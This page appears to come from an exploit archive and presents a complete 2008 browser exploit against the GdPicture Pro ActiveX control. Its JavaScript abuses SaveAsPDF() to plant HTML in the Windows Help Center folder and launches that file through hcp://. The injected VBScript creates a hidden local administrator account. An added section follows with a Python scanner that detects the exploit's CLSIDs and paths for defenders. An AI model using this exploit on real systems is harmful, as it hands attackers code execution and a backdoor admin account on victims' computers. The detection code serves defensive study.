
# Title : GdPicture Pro ActiveX (gdpicture4s.ocx) File Overwrite / Exec Exploit
# Published : 2008-09-30
# Author : EgiX


<!--

	---------------------------------------------------------------------------------
	GdPicture Pro ActiveX (gdpicture4s.ocx) Remote File Overwrite / Execution Exploit
	---------------------------------------------------------------------------------
	
	author...: EgiX
	mail.....: n0b0d13s[at]gmail[dot]com
	
	link.....: http://www.gdpicture.com/
	ProgID...: GdPicture4S.Imaging
	
	Description:
	
	The SaveAsPDF() method allows creating or overwriting a file through
	the sFilePath argument. By using other arguments, such as sTitle,
	an attacker could inject HTML code into the written file and execute it
	using the hcp:// protocol (technique discovered by rgod).
	GdPicturePro5.Imaging is also prone to this vulnerability,
	but it doesn't implement the IObjectSafety interface.
	
	Tested on Windows XP SP2 with IE 6/7
	
	Object safety report:
	
	Report for Clsid: {E8512363-3581-42EF-A43D-990E7935C8BE}
	RegKey Safe for Script: False
	RegKey Safe for Init: False
	Implements IObjectSafety: True
	IDisp Safe:  Safe for untrusted: caller,data  
	IPStorage Safe:  Safe for untrusted: caller,data

	[*] A special thanks goes to shinnai, for his patience :)

-->

<object classid='clsid:E8512363-3581-42EF-A43D-990E7935C8BE' id='test'></object>

<script language='javascript'>

	// command run by the injected VBScript (as given in the original exploit)
	var cmd = "cmd /c net user test test /add & net localgroup Administrators test /add";

	// file written by SaveAsPDF(); backslashes must be escaped in the JS literal
	var outFile = "c:\\windows\\pchealth\\helpctr\\system\\errors\\badurl.htm";

	// minimal 1x1 monochrome bitmap (66 bytes) so that CreateImageFromString() succeeds
	var BMP = "\x42\x4d\x42\x00\x00\x00\x00\x00\x00\x00\x3e" +
		  "\x00\x00\x00\x28\x00\x00\x00\x01\x00\x00\x00" +
		  "\x01\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00" +
		  "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
		  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
		  "\x00\x00\x00\xff\xff\xff\x00\x80\x00\x00\x00";

	// HTML injected through the sTitle argument; "<\/script>" keeps the HTML parser
	// from closing the outer script block at this point
	var sc = "<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='wsh'></object>" +
		 "<script language='vbscript'>wsh.Run \"" + cmd + "\", SW_HIDE<\/script>";

	test.SetLicenseNumber("0317955669879948884162456"); // only to avoid the nag screen
	test.CreateImageFromString(BMP);

	// write the file, then open it through the Help Center protocol handler
	if (test.SaveAsPDF(outFile, sc, "", "", "")) location.href = "hcp://system/errors/badurl.htm";

</script>
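As an added, defender-side example that is not part of the original exploit and not code from GdPicture: a small scanner that flags the indicators this advisory documents when they appear together in an HTML document, namely an `<object>` tag instantiating one of the two CLSIDs quoted above, an `hcp://` reference, and a path into the Help Center directory. The CLSIDs are taken from the page; the indicator names, the `scan_html` / `verdict` functions and the sample documents are constructed for illustration.

```python
import re

# CLSIDs quoted in the advisory above. This mapping is constructed for the
# example; it is not a list shipped by any vendor or tool.
FLAGGED_CLSIDS = {
    "E8512363-3581-42EF-A43D-990E7935C8BE": "GdPicture4S.Imaging (SaveAsPDF arbitrary file write)",
    "72C24DD5-D70A-438B-8A42-98424B88AFB8": "WScript.Shell (command execution from script)",
}

# <object ... classid='clsid:GUID'> with single, double or no quotes around the value
OBJECT_RE = re.compile(
    r"<object\b[^>]*\bclassid\s*=\s*['\"]?clsid:"
    r"([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})",
    re.IGNORECASE,
)
# hcp:// references (Help Center protocol handler used to open the written page)
HCP_RE = re.compile(r"hcp://[^\s'\"<>]+", re.IGNORECASE)
# a path into the Help Center tree, with backslashes (escaped or not) or slashes
HELPCTR_RE = re.compile(r"pchealth[\\/]+helpctr", re.IGNORECASE)


def scan_html(html):
    """Return a list of (indicator, value, note) tuples found in the document."""
    findings = []
    for m in OBJECT_RE.finditer(html):
        clsid = m.group(1).upper()
        if clsid in FLAGGED_CLSIDS:
            findings.append(("flagged-clsid", clsid, FLAGGED_CLSIDS[clsid]))
    for m in HCP_RE.finditer(html):
        findings.append(("hcp-url", m.group(0), "hcp:// protocol handler reference"))
    if HELPCTR_RE.search(html):
        findings.append(("helpctr-path", "pchealth\\helpctr", "file path inside the Help Center tree"))
    return findings


def verdict(findings):
    """Combine indicators: a flagged CLSID alone is suspicious; a flagged CLSID
    together with an hcp:// reference or Help Center path matches the chain
    described on this page."""
    kinds = {kind for kind, _, _ in findings}
    if "flagged-clsid" in kinds and kinds & {"hcp-url", "helpctr-path"}:
        return "high"
    if "flagged-clsid" in kinds:
        return "medium"
    if kinds:
        return "low"
    return "clean"


# Constructed sample: the object tag, output path and hcp:// redirect from this
# page, without the injected payload.
SAMPLE_HTML = r"""
<object classid='clsid:E8512363-3581-42EF-A43D-990E7935C8BE' id='test'></object>
<script language='javascript'>
  var outFile = "c:\\windows\\pchealth\\helpctr\\system\\errors\\badurl.htm";
  if (test.SaveAsPDF(outFile, "...", "", "", "")) location.href = "hcp://system/errors/badurl.htm";
</script>
"""

# Constructed benign document: an object tag with an unrelated (all-zero) CLSID.
BENIGN_HTML = (
    "<p>No ActiveX of interest here.</p>"
    "<object classid='clsid:00000000-0000-0000-0000-000000000000'></object>"
)

if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        found = scan_html(doc)
        print(name, "->", verdict(found))
        for kind, value, note in found:
            print("   ", kind, value, "(" + note + ")")
```

Run as a script it prints `sample -> high` with the three indicators and `benign -> clean`. The verdict is deliberately based on co-occurrence: the GdPicture control alone may be legitimately embedded on an intranet page, whereas the control plus a write into `pchealth\helpctr` or an `hcp://` navigation is the specific chain this advisory describes.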

# www.Syue.com [2008-09-30]